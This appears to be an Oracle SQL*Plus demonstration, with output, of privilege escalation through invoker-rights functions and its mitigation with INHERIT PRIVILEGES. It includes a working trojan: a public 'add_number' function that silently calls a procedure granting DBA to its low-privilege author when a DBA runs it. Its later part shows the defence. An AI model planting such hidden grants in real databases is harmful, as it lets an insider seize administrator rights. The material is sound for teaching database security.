CONN sys@pdb1 AS SYSDBA

DROP USER sneaky_developer CASCADE;
DROP USER normal_user CASCADE;
DROP USER dba_user CASCADE;

CREATE USER sneaky_developer IDENTIFIED BY sneaky_developer;
GRANT CREATE SESSION, CREATE PROCEDURE TO sneaky_developer;

CREATE USER normal_user IDENTIFIED BY normal_user;
GRANT CREATE SESSION TO normal_user;

CREATE USER dba_user IDENTIFIED BY dba_user;
GRANT CREATE SESSION, DBA TO dba_user;

CONN sneaky_developer/sneaky_developer@pdb1

CREATE OR REPLACE FUNCTION add_number(p1 IN NUMBER, p2 IN NUMBER)
  RETURN NUMBER AUTHID CURRENT_USER
AS
BEGIN
  RETURN (p1+p2);
END;
/

GRANT EXECUTE ON add_number TO public;

CONN normal_user/normal_user@pdb1

SELECT sneaky_developer.add_number(1,2) FROM dual;

SNEAKY_PERSON.ADD_NUMBER(1,2)
-----------------------------
                            3

1 row selected.

SQL>

CONN dba_user/dba_user@pdb1

SELECT sneaky_developer.add_number(1,2) FROM dual;

SNEAKY_PERSON.ADD_NUMBER(1,2)
-----------------------------
                            3

1 row selected.

SQL>

CONN sys@pdb1 AS SYSDBA

SELECT grantee
FROM   dba_role_privs
WHERE  granted_role = 'DBA'
ORDER BY grantee;

GRANTEE
----------------------------------------------------------------------------------------------------
DBA_USER
SYS
SYSTEM

3 rows selected.

SQL>

CONN sneaky_developer/sneaky_developer@pdb1

CREATE OR REPLACE PROCEDURE make_me_a_dba AUTHID CURRENT_USER AS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  EXECUTE IMMEDIATE 'GRANT DBA TO sneaky_developer';
EXCEPTION
  WHEN OTHERS THEN
    NULL;
END;
/

CREATE OR REPLACE FUNCTION add_number(p1 IN NUMBER, p2 IN NUMBER)
  RETURN NUMBER AUTHID CURRENT_USER
AS
BEGIN
  make_me_a_dba;
  RETURN (p1+p2);
END;
/

CONN normal_user/normal_user@pdb1

SELECT sneaky_developer.add_number(1,2) FROM dual;

SNEAKY_PERSON.ADD_NUMBER(1,2)
-----------------------------
                            3

1 row selected.

SQL>

CONN dba_user/dba_user@pdb1

SELECT grantee
FROM   dba_role_privs
WHERE  granted_role = 'DBA'
ORDER BY grantee;

GRANTEE
----------------------------------------------------------------------------------------------------
DBA_USER
SYS
SYSTEM

3 rows selected.

SQL>


SELECT sneaky_developer.add_number(1,2) FROM dual;

SNEAKY_PERSON.ADD_NUMBER(1,2)
-----------------------------
                            3

1 row selected.

SQL>


SELECT grantee
FROM   dba_role_privs
WHERE  granted_role = 'DBA'
ORDER BY grantee;

GRANTEE
----------------------------------------------------------------------------------------------------
DBA_USER
SNEAKY_DEVELOPER
SYS
SYSTEM

4 rows selected.

SQL>

REVOKE DBA FROM sneaky_developer;

INHERIT PRIVILEGES ON USER username TO PUBLIC;

CONN sys@pdb1 AS SYSDBA

REVOKE INHERIT PRIVILEGES ON USER dba_user FROM PUBLIC;

CONN dba_user/dba_user@pdb1

SELECT grantee
FROM   dba_role_privs
WHERE  granted_role = 'DBA'
ORDER BY grantee;

GRANTEE
----------------------------------------------------------------------------------------------------
DBA_USER
SYS
SYSTEM

3 rows selected.

SQL>


SELECT sneaky_developer.add_number(1,2) FROM dual;
SELECT sneaky_developer.add_number(1,2) FROM dual
       *
ERROR at line 1:
ORA-06598: insufficient INHERIT PRIVILEGES privilege
ORA-06512: at "SNEAKY_DEVELOPER.ADD_NUMBER", line 1

SQL>


SELECT grantee
FROM   dba_role_privs
WHERE  granted_role = 'DBA'
ORDER BY grantee;

GRANTEE
----------------------------------------------------------------------------------------------------
DBA_USER
SYS
SYSTEM

3 rows selected.

SQL>

ERROR at line 1:
ORA-06598: insufficient INHERIT PRIVILEGES privilege
ORA-06512: at "SNEAKY_DEVELOPER.ADD_NUMBER", line 1

GRANT INHERIT PRIVILEGES ON USER dba_user TO trusted_user;

REVOKE INHERIT PRIVILEGES ON USER dba_user FROM trusted_user;